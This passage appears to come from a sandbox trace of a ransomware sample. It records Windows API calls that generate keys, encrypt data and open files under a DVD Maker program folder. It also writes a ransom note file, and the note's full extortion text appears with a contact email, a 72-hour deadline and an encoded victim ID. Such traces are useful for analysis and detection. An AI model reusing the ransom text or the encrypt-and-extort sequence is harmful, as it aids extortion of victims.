RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.604] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fad0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fad0*=0x30) returned 1 [0092.604] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\title_stripe.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.605] GetProcessHeap () returned 0x2c0000 [0092.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.605] GetProcessHeap () returned 0x2c0000 [0092.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346568 | out: hHeap=0x2c0000) returned 1 [0092.605] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fad8 | out: pbBuffer=0x270fad8) returned 1 [0092.605] GetProcessHeap () returned 0x2c0000 [0092.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.605] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fad0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fad0*=0x30) returned 1 [0092.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.605] GetProcessHeap () returned 0x2c0000 [0092.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.605] GetProcessHeap () returned 0x2c0000 [0092.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381a90 | out: hHeap=0x2c0000) returned 1 [0092.606] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fad0 | out: pbBuffer=0x270fad0) returned 1 [0092.606] GetProcessHeap () returned 0x2c0000 [0092.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.606] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fac8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fac8*=0x30) returned 1 [0092.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.606] GetProcessHeap () returned 0x2c0000 [0092.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.606] GetProcessHeap () returned 0x2c0000 [0092.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355790 | out: hHeap=0x2c0000) returned 1 [0092.607] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fad0 | out: pbBuffer=0x270fad0) returned 1 [0092.607] GetProcessHeap () returned 0x2c0000 [0092.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.607] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fac8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fac8*=0x30) returned 1 [0092.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.607] GetProcessHeap () returned 0x2c0000 [0092.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.607] GetProcessHeap () returned 0x2c0000 [0092.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37a750 | out: hHeap=0x2c0000) returned 1 [0092.607] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fac8 | out: pbBuffer=0x270fac8) returned 1 [0092.607] GetProcessHeap () returned 0x2c0000 [0092.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.607] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fac0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fac0*=0x30) returned 1 [0092.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.607] GetProcessHeap () returned 0x2c0000 [0092.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.607] GetProcessHeap () returned 0x2c0000 [0092.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a460 | out: hHeap=0x2c0000) returned 1 [0092.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fac8 | out: pbBuffer=0x270fac8) returned 1 [0092.608] GetProcessHeap () returned 0x2c0000 [0092.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fac0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fac0*=0x30) returned 1 [0092.608] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.608] GetProcessHeap () returned 0x2c0000 [0092.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.608] GetProcessHeap () returned 0x2c0000 [0092.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381988 | out: hHeap=0x2c0000) returned 1 [0092.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fac0 | out: pbBuffer=0x270fac0) returned 1 [0092.608] GetProcessHeap () returned 0x2c0000 [0092.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fab8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fab8*=0x30) returned 1 [0092.608] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.609] GetProcessHeap () returned 0x2c0000 [0092.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.609] GetProcessHeap () returned 0x2c0000 [0092.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a360 | out: hHeap=0x2c0000) returned 1 [0092.609] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fac0 | out: pbBuffer=0x270fac0) returned 1 [0092.609] GetProcessHeap () returned 0x2c0000 [0092.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.609] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fab8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fab8*=0x30) returned 1 [0092.609] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\huemainsubpicture2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.609] GetProcessHeap () returned 0x2c0000 [0092.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.609] GetProcessHeap () returned 0x2c0000 [0092.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377ff0 | out: hHeap=0x2c0000) returned 1 [0092.609] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fab8 | out: pbBuffer=0x270fab8) returned 1 [0092.610] GetProcessHeap () returned 0x2c0000 [0092.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.610] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fab0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fab0*=0x30) returned 1 [0092.610] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\colorcycle.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.610] GetProcessHeap () returned 0x2c0000 [0092.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.610] GetProcessHeap () returned 0x2c0000 [0092.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e710 | out: hHeap=0x2c0000) returned 1 [0092.610] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fab8 | out: pbBuffer=0x270fab8) returned 1 [0092.610] GetProcessHeap () returned 0x2c0000 [0092.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.610] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fab0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fab0*=0x30) returned 1 [0092.610] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.610] GetProcessHeap () returned 0x2c0000 [0092.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.610] GetProcessHeap () returned 0x2c0000 [0092.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e638 | out: hHeap=0x2c0000) returned 1 [0092.610] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fab0 | out: pbBuffer=0x270fab0) returned 1 [0092.610] GetProcessHeap () returned 0x2c0000 [0092.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.611] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270faa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270faa8*=0x30) returned 1 [0092.611] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.611] GetProcessHeap () returned 0x2c0000 [0092.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.611] GetProcessHeap () returned 0x2c0000 [0092.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346c68 | out: hHeap=0x2c0000) returned 1 [0092.611] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fab0 | out: pbBuffer=0x270fab0) returned 1 [0092.611] GetProcessHeap () returned 0x2c0000 [0092.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.611] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270faa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270faa8*=0x30) returned 1 [0092.611] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.611] GetProcessHeap () returned 0x2c0000 [0092.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.611] GetProcessHeap () returned 0x2c0000 [0092.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3780d8 | out: hHeap=0x2c0000) returned 1 [0092.611] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270faa8 | out: pbBuffer=0x270faa8) returned 1 [0092.611] GetProcessHeap () returned 0x2c0000 [0092.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.611] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270faa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270faa0*=0x30) returned 1 [0092.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_glass_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.612] GetProcessHeap () returned 0x2c0000 [0092.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.612] GetProcessHeap () returned 0x2c0000 [0092.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346808 | out: hHeap=0x2c0000) returned 1 [0092.612] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270faa8 | out: pbBuffer=0x270faa8) returned 1 [0092.612] GetProcessHeap () returned 0x2c0000 [0092.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.612] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270faa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270faa0*=0x30) returned 1 [0092.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.612] GetProcessHeap () returned 0x2c0000 [0092.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.612] GetProcessHeap () returned 0x2c0000 [0092.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e7e8 | out: hHeap=0x2c0000) returned 1 [0092.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0092.614] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.614] WriteFile (in: hFile=0x174, lpBuffer=0x270f9d7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fb00, lpOverlapped=0x0 | out: lpBuffer=0x270f9d7*, lpNumberOfBytesWritten=0x270fb00*=0x127, lpOverlapped=0x0) returned 1 [0092.615] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.615] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fb00, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fb00*=0x2ac, lpOverlapped=0x0) returned 1 [0092.615] CloseHandle (hObject=0x174) returned 1 [0092.616] GetProcessHeap () returned 0x2c0000 [0092.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e200 | out: hHeap=0x2c0000) returned 1 [0092.616] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270faa0 | out: pbBuffer=0x270faa0) returned 1 [0092.616] GetProcessHeap () returned 0x2c0000 [0092.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.616] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa98*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa98*=0x30) returned 1 [0092.616] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\pushplaysubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.622] GetProcessHeap () returned 0x2c0000 [0092.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.622] GetProcessHeap () returned 0x2c0000 [0092.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346648 | out: hHeap=0x2c0000) returned 1 [0092.622] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa98 | out: pbBuffer=0x270fa98) returned 1 [0092.622] GetProcessHeap () returned 0x2c0000 [0092.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.622] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa90*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa90*=0x30) returned 1 [0092.622] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.622] GetProcessHeap () returned 0x2c0000 [0092.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.622] GetProcessHeap () returned 0x2c0000 [0092.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f058 | out: hHeap=0x2c0000) returned 1 [0092.622] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa98 | out: pbBuffer=0x270fa98) returned 1 [0092.622] GetProcessHeap () returned 0x2c0000 [0092.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.623] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa90*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa90*=0x30) returned 1 [0092.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.624] GetProcessHeap () returned 0x2c0000 [0092.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.624] GetProcessHeap () returned 0x2c0000 [0092.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381880 | out: hHeap=0x2c0000) returned 1 [0092.625] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa90 | out: pbBuffer=0x270fa90) returned 1 [0092.625] GetProcessHeap () returned 0x2c0000 [0092.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.625] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa88*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa88*=0x30) returned 1 [0092.625] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.627] GetProcessHeap () returned 0x2c0000 [0092.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.628] GetProcessHeap () returned 0x2c0000 [0092.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a160 | out: hHeap=0x2c0000) returned 1 [0092.628] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa90 | out: pbBuffer=0x270fa90) returned 1 [0092.628] GetProcessHeap () returned 0x2c0000 [0092.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.628] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa88*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa88*=0x30) returned 1 [0092.628] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotsdarkoverlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.630] GetProcessHeap () returned 0x2c0000 [0092.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.630] GetProcessHeap () returned 0x2c0000 [0092.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0092.630] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa88 | out: pbBuffer=0x270fa88) returned 1 [0092.630] GetProcessHeap () returned 0x2c0000 [0092.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.630] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa80*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa80*=0x30) returned 1 [0092.630] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 